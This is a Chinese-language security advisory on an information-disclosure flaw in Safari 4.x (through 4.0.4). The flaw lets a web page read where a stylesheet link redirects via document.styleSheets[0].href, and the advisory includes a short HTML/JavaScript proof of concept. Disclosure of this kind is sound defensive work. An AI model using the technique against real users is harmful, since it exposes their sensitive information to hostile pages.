漏洞起因
设计错误
危险等级
低
影响系统
Apple Safari 4.0.4 for Windows
Apple Safari 4.0.4
Apple Safari 4.0.3 for Windows
Apple Safari 4.0.3
Apple Safari 4.0.2 for Windows
Apple Safari 4.0.2
Apple Safari 4.0.1
Apple Safari 4 for Windows
Apple Safari 4
不受影响系统
危害
远程攻击者可以利用漏洞获得敏感信息。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户访问。
漏洞信息
Apple Safari是一款流行的WEB浏览器。
Apple Safari存在一个安全漏洞,允许远程攻击者获得敏感信息。
Apple Safari跟随样式表重新定向并允许读取目标的URL。通过在样式表LINK元素包含的HREF属性中设置站点URL并之后读取document.styleSheets[0].href属性值,攻击者就可以获取重新定向的目标URL。
测试方法
<link rel="stylesheet" type="text/css" href="http://www.yahoo.com">
Hola
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading
</script>
厂商解决方案
目前没有解决方案提供:
http://www.google.com/
漏洞提供者
Cesar Cerrudo
0 条评论。